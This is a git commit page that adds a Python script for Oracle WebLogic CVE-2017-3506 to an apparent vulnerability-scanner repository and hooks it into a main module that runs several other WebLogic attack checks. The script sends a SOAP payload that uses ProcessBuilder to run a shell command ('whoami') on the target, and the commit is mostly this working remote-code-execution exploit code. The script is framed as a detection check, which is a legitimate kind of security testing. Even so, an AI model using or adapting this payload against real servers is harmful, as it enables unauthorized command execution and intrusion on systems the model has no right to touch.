1120362990/vulnerability-list
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Add CVE-2017-3506

Browse Source
This commit is contained in:
rpkr
2019-08-20 18:43:01 +08:00
parent 5d5352ea74
commit 3aa7e63ca8
2 changed files with 70 additions and 3 deletions
Download Patch File Download Diff File Expand all files Collapse all files

64
weblogic/CVE_2017_3506.py Normal file
View File

@@ -0,0 +1,64 @@
# -*- coding: utf-8 -*-
# auther:dayu
import requests
import re
heads = {
'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
'Accept-Language': 'zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3',
'Content-Type': 'text/xml;charset=UTF-8'
}
def attack(url):
if not url.startswith("http"):
url = "http://" + url
if "/" in url:
url += '/wls-wsat/CoordinatorPortType'
post_str = '''
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java>
<object class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3">
<void index="0">
<string>/bin/bash</string>
</void>
<void index="1">
<string>-c</string>
</void>
<void index="2">
<string>whoami</string>
</void>
</array>
<void method="start"/>
</object>
</java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body/>
</soapenv:Envelope>
'''
print('[+]开始检测-Weblogic-CVE-2017-3506。[+]')
try:
response = requests.post(
url, data=post_str, verify=False, timeout=5, headers=heads)
response = response.text
response = re.search(
r"\<faultstring\>.*\<\/faultstring\>", response).group(0)
except Exception:
response = ""
if '<faultstring>java.lang.ProcessBuilder' in response or "<faultstring>0" in response:
print('[+]发现 CVE-2017-3506 !!!')
else:
print('[-]未发现 CVE-2017-3506 ')
print('[+]检测结束-Weblogic-CVE-2017-3506。[+]')
print('\n')
if __name__ == '__main__':
attack()

9
weblogic/Main_weblogic.py
View File

@@ -1,11 +1,13 @@
# -*- coding: utf-8 -*- # -*- coding: utf-8 -*-
import os
import re
import weblogic.CVE_2019_2725 import weblogic.CVE_2019_2725
import weblogic.CVE_2017_10271 import weblogic.CVE_2017_10271
import weblogic.ssrf import weblogic.ssrf
import weblogic.weblogic_weakpasswd import weblogic.weblogic_weakpasswd
import weblogic.CNVD_C_2019_48814 import weblogic.CNVD_C_2019_48814
import os import weblogic.CVE_2017_3506
import re
def exec(URL): def exec(URL):
weblogic.CNVD_C_2019_48814.attack(URL) weblogic.CNVD_C_2019_48814.attack(URL)
@@ -13,9 +15,10 @@ def exec(URL):
weblogic.ssrf.attack(URL) weblogic.ssrf.attack(URL)
weblogic.weblogic_weakpasswd.attack(URL) weblogic.weblogic_weakpasswd.attack(URL)
weblogic.CVE_2019_2725.attack(URL+'/') weblogic.CVE_2019_2725.attack(URL+'/')
weblogic.CVE_2017_3506.attack(URL)
print('[+]开始检测-Weblogic-CVE-2018-2628。[+]') print('[+]开始检测-Weblogic-CVE-2018-2628。[+]')
#切换工作路径 # 切换工作路径
os.chdir(os.path.realpath(__file__)[:38]) os.chdir(os.path.realpath(__file__)[:38])
url = re.findall('//(.*?):', URL, flags=0)[0] url = re.findall('//(.*?):', URL, flags=0)[0]
ip = re.findall(r':(.*?)\Z', URL[6:], flags=0)[0] ip = re.findall(r':(.*?)\Z', URL[6:], flags=0)[0]